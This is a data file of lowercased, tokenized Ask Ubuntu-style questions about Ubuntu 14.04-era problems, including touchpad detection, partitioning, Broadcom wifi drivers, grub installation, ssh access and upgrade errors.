459570	synaptics touchpad not detected while switching user on unity	synaptics touch pad is detected and works well if a single user is logged in . however if we swtich to another user , mouse no longer works for the second user . you could either switch using the lock/switch user account menu or using ctrl+alt+f8 . log file for screen0 ( ctrl+alt+f7 ) - > synaptics touch pad works fine . [ 20.205 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/event17 ) [ 20.205 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` evdev touchpad catchall '' [ 20.205 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` touchpad catchall '' [ 20.205 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` default clickpad buttons '' [ 20.205 ] ( ii ) loadmodule : `` synaptics '' [ 20.205 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 20.205 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 20.205 ] compiled for 1.15.0 , module version = 1.7.4 [ 20.205 ] module class : x.org xinput driver [ 20.205 ] abi class : x.org xinput driver , version 20.0 [ 20.205 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad' [ 20.205 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 20.205 ] ( ** ) option `` device '' `` /dev/input/event17 '' [ 20.232 ] ( -- ) synaptics : synps/2 synaptics touchpad : x-axis range 1472 - 5472 ( res 58 ) [ 20.232 ] ( -- ) synaptics : synps/2 synaptics touchpad : y-axis range 1408 - 4448 ( res 106 ) [ 20.232 ] ( -- ) synaptics : synps/2 synaptics touchpad : pressure range 0 - 255 [ 20.232 ] ( -- ) synaptics : synps/2 synaptics touchpad : finger width range 0 - 15 [ 20.232 ] ( -- ) synaptics : synps/2 synaptics touchpad : buttons : left right [ 20.232 ] ( -- ) synaptics : synps/2 synaptics touchpad : vendor 0x2 product 0x7 [ 20.232 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 20.232 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 20.264 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio1/input/input9/event17 '' [ 20.264 ] ( ii ) xinput : adding extended input device `` synps/2 synaptics touchpad '' ( type : touchpad , id 12 ) [ 20.264 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 20.264 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) maxspeed is now 1.75 [ 20.264 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) accelfactor is now 0.040 [ 20.264 ] ( ** ) synps/2 synaptics touchpad : ( accel ) keeping acceleration scheme 1 [ 20.264 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration profile 1 [ 20.264 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 20.264 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 20.264 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 20.264 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/mouse1 ) [ 20.264 ] ( ** ) synps/2 synaptics touchpad : ignoring device from inputclass `` touchpad ignore duplicates '' log file for screen1 ( ctrl+alt+f8 ) - > second user synaptics touch pad not detected [ 32380.253 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad' [ 32380.253 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 32380.253 ] ( ** ) option `` device '' `` /dev/input/event17 '' [ 32380.260 ] ( ee ) synaptics : synps/2 synaptics touchpad : synaptics driver unable to detect protocol [ 32380.260 ] ( ee ) preinit returned 11 for `` synps/2 synaptics touchpad '' [ 32380.260 ] ( ii ) unloadmodule : `` synaptics '' [ 32380.260 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/mouse1 ) [ 32380.260 ] ( ** ) synps/2 synaptics touchpad : ignoring device from inputclass `` touchpad ignore duplicates '' output of xinput on screen 0 ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎜ ↳ mce ir keyboard/mouse ( ene_ir ) id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ hp webcam id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=14 [ slave keyboard ( 3 ) ] ↳ ene ehome infrared remote receiver id=15 [ slave keyboard ( 3 ) ] are there any known workarounds till a proper fix can be made available ?
459571	root filesystem too small - what 's preferrable ?	after a number of upgrades , and a steady flow of software installed , the original root filesystem is starting to split at the seams . the original ( notebook ) setup : ( lvm ) / 17g everything but `` payload '' data sda1 /boot 228m ( lvm ) swap 8g ( lvm ) /home xxg home directories ( lvm ) /export xxxg collections that should not clog up home directories , have a larger backup cycle , and can be restored from external sources . examples . src , install , iso-images , video , ... originally , the lvm setup had a sound reserve to grow existing filesystems as needed , but that space has been spent , so some stuff that never ever got used got relocated to the background server . options to handle the squeze : grow the root filesystem at the expense of /export split the root filesystem /var contains a growing set of archived packages in /var/cache/apt/archives /usr is another large subset to split out - grows with every package installed
459572	mac air ca n't remember brightness after reboot	i have installed ubuntu 14.04 successfully on my mac book air . i was quite exiting until i reboot it . both screen brightness and keyboard light are the maximum bright , not good for eye also . i tried to add a startup script to adjust the brightness , but it was not working . in the login screen , i tried to press f1 and f2 before i login but nothing happen . i suspected ubuntu access right issue caused the script was not running . anyway it was not perfect to adjust the brightness during every start . and ubuntu boot much slower than mac os in mac air .
459573	double click not working as expected in file manager	i have ubuntu 14.04 installed on my laptop . i have a dell xps l502x which works very good . i just noticed this ( possible bug ? ) with ubuntu 14.04 while in the file manager in the home folder . when i try to double click on any folder , it does not open . but double click works every where else . i was having the similar problem with ubuntu 13.10 in my home folder , where backspace was not working to navigate to previous folder .
459574	preseeding ubuntu 12.04 ignores partitioning scheme	i 've been battling with this problem for a couple of weeks now . i 'm trying to automate the installation of ubuntu servers using pxe and kickstart . i 've managed to fix most problems i 've run in to through google but this one has me stumped . the only other example of this problem i can find is on askubuntu where a guy is asking exactly the same question i 'm about to ask but it has no responses . from this i can conclude one of two things - no-one is using kickstart or this is a problem cause by some obscure setting i have n't found . to my question . this line in my preseed file d-i partman-auto/choose_recipe select atomic supposedlyartitions the entire disk as one partition . exactly what i want . however , onc the install is complete , my disk looks like this filesystem size used avail use % mounted on /dev/mapper/server1-root 9.2g 1.5g 7.3g 18 % / ... some other stuff like udev ... /dev/sda1 228m 25m 191m 12 % /boot /dev/mapper/server1-home 203g 188m 192g 1 % /home so the hard disk has been partitioned with a tiny root partition and a massive home partition . reading the manuals implies this is what d-i partman-auto/choose_recipe select homes does but it also implies there 's no `` default '' action - that is if my syntax for this line was wrong or if it was missing altogether , the installer would stop and ask me what to do . but it does n't - it just ploughs on and creates this massive /home partition . the main thing that 's confusing me ( which the other poster did n't mention ) is why it's /dev/mapper/server1-home that implies to me it thinks it 's a raid or some other dm volume . which it is n't - it 's a single 240gb disk . the rest of my preseed as it stand at the moment is below . please note this is version 1 million and something - i 've really been hacking away at this for days . i 've tried non-lvm versions and so on . this just happens to be the most recent version i tried before i posted on here . d-i partman-auto/disk string /dev/sda d-i partman/default_filesystem string ext4 d-i partman-auto/method string lvm d-i partman-auto/purge_lvm_from_device boolean true d-i partman-lvm/device_remove_lvm boolean true # d-i partman-md/device_remove_md boolean true d-i partman-lvm/confirm boolean true d-i partman-auto-lvm/guided_size string max d-i partman-auto/choose_recipe select atomic d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true the machine also has a second 1tb disk in it which would be mounted as /data once i get the first disk portioned correctly . i really hope someone out there can help because i 've spent way to long on this one problem . steve
459576	shortcut to rename workspace in gnome	you can `` right-click = > preferences '' on the gnome workspace switcher to rename the workspaces . i 'm wondering if it is possible to configure a keyboard shortcut to trigger renaming the current active workspace .
459583	how to install matlab 2012 unix on ubuntu	i am trying to install matlab by running install.sh from .iso through terminal . i even installed java for that but still it does n't run at all . can any one help me ?
459585	launcher auto-hide not working ubuntu 14.04	i 'm running ubuntu 14.04 . i generally have the unity launcher in auto-hide mode . problem starts if the desktop has been locked and then unlocked . then the unity launcher does not disappear again .
459586	no desktop after upgrading to ubuntu 14.04 from 13.10	just reporting what appears to be a known problem with the upgrade . fortunately i have my stuff backed up . i do not want to have to reinstall . i was working fine with 13.10 & decided to upgrade to 14.04 . i should have waited to see if there might be problems . i know better and will not accept the offer so fast next time . after the upgrade completed , i could no longer bring up my desktop . the computer boots to the login prompt . i am able to enter my password for the normal user but it does not respond at all and simply shows an empty background ( nothing to do further , nothing to click on ) . hopefully , this will be remedied . please suggest me to bring back the computer to normal operations .
459587	are there any dictionary widgets for gnome panel ?	as the title suggests , are there any dictionary-like a widgets that can place on my gnome panel like indicator synapse where i just have to search for words & frame sentence for that word ? similar to this i do n't really mind if it 's online or offline .
459590	open stack installation on ubuntu 14.04 ?	can any one provide step by step installation of open stack installation on ubuntu 14.04 ? or is there any script like http : //openstack.redhat.com/quickstart for auto installation . i have tried devstack on ubuntu but it did n't work ( credentials not working ) . dumidu answer did work ( installation ) but there is no username or password for the installation , so there is nothing to check its working or not . is there any way to install openstack on ubuntu ?
459591	how to disable screen dimming in 14.04 ?	when i am inactive for 4-5 minutes , the screen is automatically dimmed . this is too much boring when i am watching movie . how to disable this thing ? ?
459593	no additional drivers available	i just bought new computer and installed ubuntu . it works pretty well , but i ca n't change drivers because ubuntu says that there is no drivers available . my graphics card is nvidia geforce gtx 750 ti gaming edition . is something wrong in my computer or is there any other solutions ? here is other details : intel® core™ i5-3570k cpu @ 3.40ghz × 4 disk : 980,2 gb
459597	dual boot useing separate drives	i have installed ubuntu 14.04 on a 120gb sdd and mythbuntu 14.04 on a 320gb hdd separately in my old dell gx-620 tower . if i connect both drives neither will boot and i have to reinstall the os in both . how can i solve this problem to get computer to dual boot ? i am new to linux .
459601	finding klondike e card 3 pass las vegas rules solitiare for ubuntu	due to the recent internet explorer xp debacle , a friend enticed us to run on ubuntu . my husband and i are in our late 70 's . he loves to play klondike 3 card 3 pass solitaire las vegas rules . i have been unable to find a version that will download onto ubuntu . can anyone help ?
459603	laptop screen goes blank after 33 seconds of inactivity	i have a lenovo thinkpad t60 running 12.04.4 lts , precise pangolin ; the desktop is kde . starting today , the display goes blank after 33 seconds of inactivity . clicking or even moving the mouse , or pressing a key , resets the 33-second timer . i have checked the following settings : system settings / screen saver settings ( screenshot ) : these are turned off . turning them on and setting an explicit timeout of 9 minutes did not change the behavior . system settings / energy saving settings ( screenshot ) : these are turned off . turning on `` dim display and setting to 10 minutes did not change the behavior . x server settings ( xset ) : the xset q command reported : screen saver : prefer blanking : yes allow exposures : yes timeout : 0 cycle : 600 the timeout : 0 indicates that the x screen saver feature is disabled . explicitly disabling it with xset s off did not change the behavior . how do i stop this annoying screen blanking ?
459606	ubuntu and qt creator keyboard layout change problem	when i run qt creator on my ubuntu 14.04 with english layout , it always types in english and it wo n't change if i change my layout to other language . in front , when i run qt creator with persian layout , it only lets me to write in persian and it does not change with keyboard layout changing . i have searched a lot , but i could n't find any solution .
459607	awesome vm ca n't seem to be able to find some programs in the right-click menu	basically i ca n't find skype or spotify in the right click menu , where i can find all other applications i 've installed . i am looking for some way to be able to start them ( even if it is through a search ) . note : i know i can start them from the console , but i am wondering if there is another way
459610	create container in openstack using phpopencloud	i want to create a container using phpopencloud . i have deployed openstack using devstack on single machine . i have this code : - require 'vendor/autoload.php ' ; use opencloud\openstack ; $ client = new openstack ( 'http : //192.168.171.131:5000/v2.0 ' , array ( 'username ' = > 'admin ' , 'password ' = > 'devstack' ) ) ; $ service = $ client- > objectstoreservice ( 'swift ' , 'nova ' ) ; i am getting this error . fatal error : uncaught exception 'opencloud\common\exceptions\endpointerror' with message 'no endpoints for service type [ object-store ] , name [ swift ] , region [ nova ] ... . can some one tell me how do make use of openstack services through phpopencloud
459612	firefox problem with ubuntu font when default	my firefox browser is the only browser i know renders site input tags differently , every other browser ( including other firefox browser renders input tags the same way ) . see the picture for the difference you can visit the site on https : //drupal.org/project/omega_kickstart and i bet it wo n't look the same way on your firefox installation . i have tried many times to remove the browser and every possible setting but nothing gives . i run ubuntu 14.04 and the newest firefox ( 29.0 ) . i have followed these guides for removing it completly on ubuntu : http : //stackoverflow.com/questions/18825420/how-to-completely-remove-firefox-and-reinstall-in-fedora http : //swiss.ubuntuforums.org/showthread.php ? t=875495 http : //ubuntuforums.org/showthread.php ? t=1215352 but it does not solve the problem < input > tag just becomes long at my firefox browser , what can i do ( i do n't want to reinstall ubuntu for this , there has to be a simpler way ) ... my system fonts are default ... but when i change to waree bold oblique it renders normally , how can i restore default font to default ?
459613	database not working on actual ubuntu touch device	i 'm currently developing an application for ubuntu touch . it already has some basic functionalities and utilizes localstorage/sqlite . when running directly from the ubuntu sdk itworks fine but when i create a click package and install it to my actual device the database doesnt seem to work . i thought it 's related to the security groups but i already added almost all of them except the media groups but still no luck . my device is a nexus 7 2013 and i install the click package through the following commands since install to device functionality doesnt work in ubuntu sdk app . thanks sudo pkcon install-local filename sudo click register -- user=phablet packagename version
459617	keyboard layout is n't kept upon reboot	i had a problem with the keyboard layout changing from pt ( i 'm portuguese ) to en automatically with the last ubuntu updates in ubuntu 13.10 . after ubuntu 14.04 came out , i formatted my computer and installed the new version . after that i have n't had any problems until the recent ubuntu base update 2 or 3 days ago , when i started having the same problem again . i even removed the english keyboard from the keyboard configurations , left only the portuguese one , but still , every time i reboot my pc i get the keyboard configured for en , despite ubuntu displaying the contrary ? how can i remove this ? i do n't want to format the pc again and i 'm getting really tired of this problem , since it looks like many portuguese/brasilian ubuntu users are having the same problem .
459619	problems upgrading & installing packages	for some reason i find it hard to update packages and install new ones on ubuntu 13.10 . for example , when i try to apt-get update , i get this error : w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty_universe_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty_main_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty_universe_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . any suggestions ?
459620	`` unable to install grub in /dev/sda '' when installing grub	i recently bought a shiny new lenovo yoga 2 pro and i want to dual boot it with ubuntu for studying purposes . its built-in os is windows 8.1 and it has a 256gb ssd . i 've made a separate 90gb partition just for ubuntu and a live usb to install it . the first time everything seemed to work great , i solved the wifi issued by blacklisting ideapad_laptop , the installation went flawlessly and ubuntu worked fine . when i got up the next morning and turned on my laptop it booted into windows right away without ever showing the grub menu . so i tried to reset , and checked my partitions with the disk manager and everything looked fine . since i could n't find a solution online i went ahead and formatted the partition to try and install again . this time and every time since , the installation was aborted and i got a fatal error saying : unable to install grub in /dev/sda executing `grub-install /dev/sda` failed . this is a fatal error . can anyone please suggest a solution to this problem ? if any further information is needed i would be happy to provide it . thanks . when installing i get the following in details : ubuntu kernel : [ 1946.372741 ] fat-fs ( sda2 ) : error , fat_get_cluster : invalid cluster chain ( i_pos 0 ) . ubuntu grub-installer : error : running 'grub-install -- force failed .
459623	quake terminal : switch to numbered tab	is there a way to directly navigate to a tab in guake instead of cycling ? in most tabbed apps i can press alt+1 to go to the first terminal , alt+2 for the second , etc . guake seems to only let me cycle between tabs ( ctrl+page down ) . i do n't want to use yakuake . i 'm also aware of tilda but it 's a little quirky .
459627	is there a way to set partition to root ( '/ ' ) without reformatting ?	long story short . i accidentally removed my grub , and my partition set with mount point '/ ' . i did remedy this by re-installing ubuntu from a livecd ( usb ) , and set the mount point for the new partition ( with 2nd version of ubuntu ) as '/ ' , and the ubuntu installer reinstalled grub . ( i had tried using boot-repair , from livecd but it was not working ) my question is : is it possible for me to remove this old system to get back the used space , and re-assign my original ubuntu to the mount point '/ ' , without having to copy reformat et cetera ? reasons why : i do not have a mass storage device which would have the space , to hold everything on this partition ( current/1st ubuntu ) . no optical drive . lots of settings , and other things i wish to save computer was pre-packaged with ubuntu , making finding drivers un-needed ( would rather not have to go through hassle of finding everything , because i know some did not work in livecd ) lsblk below : df -h -- total ( edit : for more information ) the netbook i have was pre-installed with ubuntu , so it was not set up in the 'normal ' way i.e . my os was not set up on the same partition as the mbr , and grub . there is also a recovery partition which contains the ubuntu recovery . the boot information was set at / for a mounting point . sda1 -- fat32 partition sda2 -- fat32 partition sda3 -- 2nd ubuntu install root directory ' / ' sda4 -- encrypted swap sda5 -- 1st ubuntu install home directory ' /home ' sda7 -- other os ( ubuntu 14.04 ) sda8 -- unused zram0 and zram1 -- swap partitions for linux steps taken : from livecd- opened terminal to clone /sda5 -- sudo dd if /dev/sda5 of=/dev/sda7 conv=notrunc , noerror from new terminal did watch -n5 'sudo kill -usr1 $ ( pgredp ^dd ) to see progress of dd ( this took about 24 hours to finish ) tried to load from hard-drive . system loaded into grub command line ( not bootloader ) . ran livecd again installed boot-fix , ran through repair . default os is now set to sda5 in grub , still have messed up partition mount points . ( up to step 5 os was intact ) formatted sda7 . resized sda5 . one of these last 2 steps destroyed grub , and bootability of partitions ( i.e . none of the 3 ubuntus will load ) livecd , tried boot-repair 3 times , after 1st `` fix '' was unable to access grub options in advanced options of boot-repair ( could not purge/reinstall grub ) mounted sda5 , to see if i could get files off , but the disk was unreadable . ( guessing due to resize in step # 7 ) wiped everything and re-installed ubuntu . unfortunately i have to redo all my settings , fortunately i do keep backups of important data , but still lost some . lesson to myself . be careful when partitioning . although it looked like booting would work with sda3 intact , it seems as if some of the boot information may have been stretched across partitions . cloning from sda5 to sda7 ( with dd ) did not work either . ( sda7 would not boot after sda5 was cloned over , but probably because of size difference , and cloning needs exact size to duplicate ) . so i formatted sda7 , and expanded sda5 . this caused my sda5 information to get messed up . if i only had information ( not full system tweaks ) the answer below would most likely work . the biggest problem i had is that when using the livecd , i had to mount my drives manually ( using terminal , mkdir /temporary/folder/ , mount /dev/sdxy/ /temporary/folder ) , but not always.. sometimes the system automatically mounted , so i would have to dismount , if i wanted to change anything . it was inconsistent .
459628	audio does n't work after upgrade from 12.04 to 14.04	after upgrading from 12.04 to 14.04 , audio is missing , even if i start my pc ( hp pavillion ) with the ubuntu 14.04 cd rom . alsa does not work either in the enviroment created to test ubuntu . i suspect there is an incompatibility between this ubuntu version and my audio device . i hope someone can fix this . specifications : manufacturer : hp-pavilion product name : kt459aa-abz m9290.it product version : firmware version : 5.21 kernel information : kernel release : 3.13.0-24-generic operating system : gnu/linux architecture : i686 processor : i686 smp enabled : yes alsa version : driver version : k3.13.0-24-generic library version : 1.0.27.2 utilities version : 1.0.27.2 alsa-info.txt.lmwf07fmf0 1558l , 39580c 1,1 cim
459630	inaccessible data after upgrade to 14.04 from 13.10	upgrade hung at the stage where tru type fonts were being installed . tried to reboot and got the ubuntu screen showing the messages about `` serious errors being found in the disk drive for / . with the suggestion of ignoring , skip mounting or manual recovery . tried various suggestions from similar situations described on stack exchange with no success . made a live cd and eventually successfully installed 14.04 in another partition . i had 13.10 installed in windows 7 via wubi which worked well until this hiccup . most data is backed up in ubuntu one ( for the moment ) but there is some data still in the old ubuntu partition i would very much like to retrieve . this partition mounts as a device but i can not see and therefore can not get at the data . does anyone have a suggestion ?
459634	ca n't get server to respond to ssh	i am the admin of a private server and i 'm pretty new to administration . ssh was working fine until i upgraded to 14.04 . something went wrong with the upgrade so i downgraded to 13.04 . now ssh does n't work , that is , when a remote tries to connect , the server does n't respond . i used ifconfig to double check the server ip . the network card ( wireless ) works fine . i can ping 8.8.8.8 without a problem . if i sudo service ssh status i see a process . when i ps -ef | grep sshd i see the process running . doing a netstat -ln i can see tcp ... 0.0.0.0:22 . /etc/ssh/sshd_config shows password auth is enabled . there is a ~/.ssh directory with a 'known_hosts file in it . on the server , i can ssh localhost and get a response . anyone know what could be happening ? what should i do next ?
459638	updating appindicators label does not work from python thread	i am new to python and gui programming . i was trying to learning both by doing a small application . in my application , a background process should run always and show the user 's some fictional quota via appindicator . here is my code : # ! /usr/bin/env python import pyjsonrpc from gi.repository import gtk from gi.repository import appindicator3 as appindicator import thread import glib ind = none def start_gtk_main ( ) : ind = appindicator.indicator.new ( `` example-simple-client '' , `` indicator-messages '' , appindicator.indicatorcategory.application_status ) ind.set_status ( appindicator.indicatorstatus.active ) ind.set_label ( 'na ' , '' ) menu = gtk.menu ( ) menu_quit = gtk.menuitem ( `` quit '' ) menu_quit.connect ( `` activate '' , quit_app ) menu.append ( menu_quit ) menu_quit.show ( ) ind.set_menu ( menu ) try : thread.start_new_thread ( update_ind_label , ( ) ) except : print `` error : unable to start thread '' gtk.main ( ) def quit_app ( self ) : gtk.main_quit ( ) def update_ind_label ( ) : value = glib.timeout_add_seconds ( 5 , handler_timeout ) def handler_timeout ( ) : url = `` http : //localhost/jsonrpc-server/ '' http_client = pyjsonrpc.httpclient ( url ) response = http_client.call ( `` getquota '' , 2 ) quota = response.get ( 'quota ' ) ind.set_label ( quota+ ' % ' , '' ) return true if ind is none : start_gtk_main ( ) the problem is whenever glib 's timeout_add_seconds fire the callback function handler_timeout , it gives me segmentation fault error . i also tried without thread like : # ... .other code ... . glib.timeout_add_seconds ( 5 , handler_timeout ) gtk.main ( ) # ... .other code ... . but it gives me the same error . i saw many similar questions around internet , most of them suggested to use glib 's or gobject 's timeout function or threads but none is working in my case . can anyone tell me what i 'm doing wrong here ? fyi , my os is xubuntu 13.10 .
459639	nouveau vdpau support in trusty	i have geforce 8300 and as far as i can read this page : http : //nouveau.freedesktop.org/wiki/videoacceleration/ some vdpau decoding acceleration should be supported by the nouveau drivers for my card . i have been testing and i have n't been able to make it work . is there something that needs to be done on trusty to enable those features ?
459640	internal mic works but external mic does not	when i plug my external mic in , sound settings recognizes the switch , however when i try to record anything or use skype all i hear is audio from the built-in mic just being played . i have tried turning down the volume of the internal mic in alsamixer but that did n't really work . the mic plugs in via audio input jack btw . my internal mic is unusable as it is right next to my fan and my fan is extremely noisy . please help if you can .
459641	viber ( wrong architecture 'amd64 ' )	i want to use viber for ubuntu but when i try to install it this error display , i have ubunto 12.04 tls thanks for yours help
459644	install 14.04 error mounting /dev/sr0	error mounting /dev/sr0 at /media/james/ubuntu 14.04 lts i386 : command-line mount -t `` iso9660 '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 '' `` /dev/sr0 '' `` /media/james/ubuntu 14.04 lts i386 '' ' exited with non-zero exit status 32 : mount : block device /dev/sr0 is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/sr0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try `dmesg | tail or so` how can i fix this ?
459645	a program for building a site	i switched from windows 9xp ) to ubuntu and i am overjoyed ! ! really am ! most things i did on windows i can do ( sometimes even better ) in ubuntu . but.. i used homesite on windows . and i ca n't find a good website building program for ubuntu . anyone any suggestions ? thanx andries meijer ( the netherlands )
459651	install 2 linux distros in 2 separate disks	my computer has 2 hdd disks . one with 80 gb and the other with 160 gb . i have already install debian 7.0 wheezy in the 80 gb disk and i am planning to install ubuntu 14.04 lts into the 160 gb . i do n't know what i have to do about the grub configuration and what to do . i wrote this question to ask you about working between 2 linux distros . all the tutorials are wroten only for windows and linux , so i need to know if i have to do something cause i want to use the two operation systems without loosing the one of them .
459654	drivers for broadcom bcm43142 on ubuntu 14.04 ( trusty tahr )	i am not able to install drivers for my wi-fi + bluetooth card ( broadcom bcm43142 ) . what i have done till now : i have tried using the drivers at this website . i tried following the instructions given here for both the apt-get install , download tar ball and install and offline install ( from ubuntu 's boot dvd ) . i tried installing bcmwl-kernel-source . at the end of every single method [ 1,2,3 ] , when i do a sudo modprobe wl , i invariably get this : modprobe : error : could not insert 'wl ' : exec format error . i have also tried blacklisting drivers other than wl and have tried reinstalling the same several times . i also tried using ndiswrapper which was successful enough to make the unclaimed driver ( see below for the output of lshw -c network ) change to something else . however at the end the wi-fi did now show up or work . kernel version : 3.13.0-24-generic i have tried everything i could do to my full ability . it would be extremely helpful if you could help me setup my wi-fi . i am willing to pastebin output of any commands that you might ask me to execute . ( i have added the outputs of lshw -c network and lspci -nn , but please do n't hesitate to ask me anything else . ) lshw -c network warning : you should run this program as super-user . *-network unclaimed description : network controller product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory:90500000-90507fff lspci 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) the output of sudo apt-get install bcmwl-kernel-source . the official driver ( by ubuntu ) for this wlan card : sudo apt-get install bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : wireless-bcm43142-oneiric-dkms the following new packages will be installed : bcmwl-kernel-source 0 upgraded , 1 newly installed , 1 to remove and 0 not upgraded . need to get 0 b/1,126 kb of archives . after this operation , 1,417 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 318223 files and directories currently installed . ) removing wireless-bcm43142-oneiric-dkms ( 6.20.55.19~bdcom0602.0400.1000.0400-0somerville1 ) ... removing all dkms modules done . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ( 0.103ubuntu4 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-24-generic selecting previously unselected package bcmwl-kernel-source . ( reading database ... 318162 files and directories currently installed . ) preparing to unpack ... /bcmwl-kernel-source_6.30.223.141+bdcom-0ubuntu2_amd64.deb ... unpacking bcmwl-kernel-source ( 6.30.223.141+bdcom-0ubuntu2 ) ... setting up bcmwl-kernel-source ( 6.30.223.141+bdcom-0ubuntu2 ) ... loading new bcmwl-6.30.223.141+bdcom dkms files ... building only for 3.13.0-24-generic building for architecture x86_64 building initial module for 3.13.0-24-generic done . wl : running module version sanity check . - original module - installation - installing to /lib/modules/3.13.0-24-generic/updates/dkms/ depmod ... ... . dkms : install completed . this is the error i keep getting repeatedly : modprobe : error : could not insert 'wl ' : exec format error update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ( 0.103ubuntu4 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-24-generic also , what is meant by the same ? i went through the following ask ubuntu questions : how do i install bcm43142 wireless drivers for dell vostro 3460/3560 ? installing broadcom wireless drivers the second one seems to be a very comprehensive summary of all possible ways ... still i am stuck up with this exec format error .
459657	ubuntu 14.04 on msi gp60 with gigabyte motherboard	today i 've installed ubuntu 14.04 lts and i have two problems . first is with my usb mouse ( which not responding ) and second is that after few minutes whole system freeze . know someone how to solve this problem ?
459663	can not upgrade from 12.10 to newer version : upgrade not supported error	when i use the terminal to attempt to upgrade from 12.10 it errors out and says i can not upgrade . since i 'm more or less a novice user i have no idea what to do/how to work around the issue to make the upgrade other than doing a new install from a memory stick ( which i 'd like to avoid if possible - i have backed up my data , but do n't really want to reload/restore everything if i can avoid it ) . i did a check for new release and it shows me 13.10 is available . i 've tried upgrading using the upgrade window when it tells me that a new version is available , but i always get an error and then when i try to submit feedback through the tool that errs out as well . the text that is returned when using the terminal is below . any help is appreciated . ~ $ do-release-upgrade checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1,134 kb ] fetched 1,134 kb in 6s ( 130 kb/s ) authenticate 'saucy.tar.gz ' against 'saucy.tar.gz.gpg ' extracting 'saucy.tar.gz' traceback ( most recent call last ) : file `` /usr/bin/lsb_release '' , line 26 , in < module > import lsb_release eoferror : eof read where not expected reading cache traceback ( most recent call last ) : file `` /usr/bin/lsb_release '' , line 26 , in < module > import lsb_release eoferror : eof read where not expected checking package manager traceback ( most recent call last ) : file `` /usr/bin/lsb_release '' , line 26 , in < module > import lsb_release eoferror : eof read where not expected can not upgrade an upgrade from '' to 'saucy ' is not supported with this tool . ~ $
459665	downgrading bison	i got into some trouble trying to compile wine . however , i find out that the problem depends on bison 3.0 , on 2.7.1 it should be working fine . but when i wan na downgrade bison via : sudo apt-get install bison=2.7.1 i get reading package lists ... done building dependency tree reading state information ... done e : version '2.7.1 ' for 'bison ' was not found
459666	how to give wine/ windows application access to privileged ports	i 'm trying to get a windows based game to run under wine . the game itself needs access to ports 80 and 443 . i understand these are privileged ports , and a program needs root access to use them , but i obviously do n't want to give wine root access . i looked searched for a simplish answer , and it seems as if using either iptables or authbind is my best bet , but i ca n't find directions that i understand well enough to make work .
